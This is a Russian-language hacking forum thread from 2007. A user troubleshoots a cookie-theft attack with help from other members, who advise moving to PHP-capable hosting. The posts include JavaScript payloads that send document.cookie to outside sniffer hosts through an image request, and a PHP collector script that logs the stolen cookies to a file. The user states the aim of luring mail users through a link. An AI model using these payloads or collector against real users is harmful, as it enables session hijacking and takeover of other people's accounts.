на счет перехвата cookies. что я не так делаю?

Discussion in 'Уязвимости Mail-сервисов' started by Miixxa, 19 Jul 2007.

  1. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    вообщем у меня вопрос на счет перехвата cookies, можете мне объяснить, что я не так делаю?
    вот есть скажем к примеру:
    1. лог сниффера http://hackedpro.org/tools/sniff/log.php
    2. адресс сниффера http://hackedpro.org/tools/sniff/s.gif

    начала с того что просто тупо в браузере ввел:
    http://hackedpro.org/tools/sniff/s.gif?document.cookie

    в логе посмотрел, получил инфу кроме моего cookies

    далее создал файл с раширением html в котором:
    <script>
    img = new Image();
    img.src = "http://hackedpro.org/tools/sniff/s.gif?"+document.cookie;
    </script>

    запустил его, эффект тот же (все кроме cookies).

    Далее разместил на сайте www.miixxa.narod.ru
    2 файла:
    первый php-script.php в котором:
    <?
    $query="{$HTTP_GET_VARS['com'] }\r\n"; //эта часть скрипта принимает украденные cookies, переданные JavaScript'ом.
    $file="cookies.txt"; //здесь мы определили файл, куда будет производиться запись полученных cookies.
    if (is_writeable ($file)) { //проверяем можно ли производить запись в файл.
    $fh=fopen ($file, "a+"); //открыли файл для записи, запись всегда будет производиться в конец файла.
    fputs ($fh, "$query"); //записали cookies в файл.
    fclose ($fh); } //после записи закрыли файл.
    else {
    echo "Error!"; //Этот скрипт не просто запишет украденные cookie, но и скажет нам если вышла какая-то ошибка.
    }
    ?>

    и второй файл cookies.txt

    Создал третий файл 1.html в котором:

    <script>
    img = new Image();
    img.src = "http://www.miixxa.narod.ru/php-script.php?com="+document.cookie;
    </script>

    запустил этот файл, проверил cookies.txt - ничего.

    Что я не так делаю? можете помочь?
     
    #1 Miixxa, 19 Jul 2007
    Last edited: 19 Jul 2007
  2. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    ты с полом все-таки определись))

    1.php и php-script.php - разные названия одного скрипта, а они должны совпадать =)
     
  3. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    отредактировал, по именам фалов все ок, просто здесь ошибься.... Жду помощи в чем моя ошибка...
     
  4. n3m0

    n3m0 Elder - Старейшина

    Joined:
    11 May 2007
    Messages:
    133
    Likes Received:
    92
    Reputations:
    11
    На НАРОД.Ру вроде нету поддержки Php
     
    1 person likes this.
  5. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    Это бред какой-то... почитай в манах как это делать(там все написано!), попробуй на себе...
     
  6. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    да, живопись интереснее, там все понятнее :) может мне кто-нибудь укажет конкретно что мне изменить в моих действиях, в файлах....?
     
  7. Piflit

    Piflit Banned

    Joined:
    11 Aug 2006
    Messages:
    1,249
    Likes Received:
    585
    Reputations:
    31
    хостера тебе надо изменить
     
  8. NOmeR1

    NOmeR1 Everybody lies

    Joined:
    2 Jun 2006
    Messages:
    1,068
    Likes Received:
    783
    Reputations:
    213
    поменяй хостинг, на котором лежит php-script.php, на любой с поддержкой PHP (tulpar.net, fatal.ru, holm.ru, 6te.net......)
     
    1 person likes this.
  9. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    т.е. запуская файл 1.html я краду кукесы с народа.ру? а если разместить данный файл также на народе а в мыле адресу вставить ссылку на него, то кукесы опять с народа будут?
     
  10. Y.Dmitriy

    Y.Dmitriy Banned

    Joined:
    14 Mar 2007
    Messages:
    208
    Likes Received:
    85
    Reputations:
    16
    ДА НЕТ НА НАРОДЕ ИНТЕРПРИТАТОРА ПХП ФАЙЛОВ... там только статический файлы .html, .xhtml и тд... тебе нужон хостинг с поддержкой ПХП! удачи!
     
  11. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    т.е. поменяю хостера, а остальные действия верны и содержимое файлов?
     
  12. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    а практика? :)
     
  13. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    а document.cookie на 'document.cookie' менять не надо?
     
  14. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    их задать можно будет? :)
     
  15. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    я же патыюсь сделать что-то и спрашиваю в чем ошибка... что здесь плохого? можно просто ответить что лень объяснять и все, зачем лишние слова?
     
  16. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    все тоже самое я проделал на www.siteburg.com
    в файл cookies.txt не происходит записей, может все же ошибка есть в другом?
     
  17. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    объяснил доступно. Спасибо!
     
  18. ch[@]ch

    ch[@]ch Banned

    Joined:
    21 Jun 2007
    Messages:
    1
    Likes Received:
    16
    Reputations:
    -2
    человек попросил о помощи....вы ему "помогли"....если не хотите так не надо тут писать!!!или дайте совет!и ещё на ачате статьи для новчиков старые как моя бабушка....и с помощю статьей нельзя практикаваться....

    Я бы посоветовал тебе www.jino-net.ru
     
  19. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Еще раз всем привет. Сделал все как мне все советовали. Поменял хост с поддержкой пхп, цги. В файл cookies.txt изменения не вносяться, у файла с данными:
    <script>
    img = new Image();
    img.src = "http://www.ххх.ххх.ru/php-script.php?com="+document.cookie;
    </script>

    должно быть расширение .html ? или .js?

    далее скачал с kanick.ru/sniffer сниффер, закинул на сайт, но когда запускаю файл html с данными:

    <script>
    img = new Image();
    img.src = "http://www.ххх.ххх.ru/s.gif?"+document.cookie;
    </script>

    То в логе сниффера есть IP, строка брузера, а кукесов нет (
    При таком варианте: http://www.ххх.ххх.ru/s.gif?document.cookie в логе в строке QUERY вместо данных кукес надпись "document.cookie"
    блин читал на форуме, в поисковиках об этом. Ничего не нашел.
    Может поможете мне в последний раз? А?
     
  20. Miixxa

    Miixxa New Member

    Joined:
    17 Jul 2007
    Messages:
    19
    Likes Received:
    0
    Reputations:
    0
    Invlose, можем пообщаться по асе? 352973306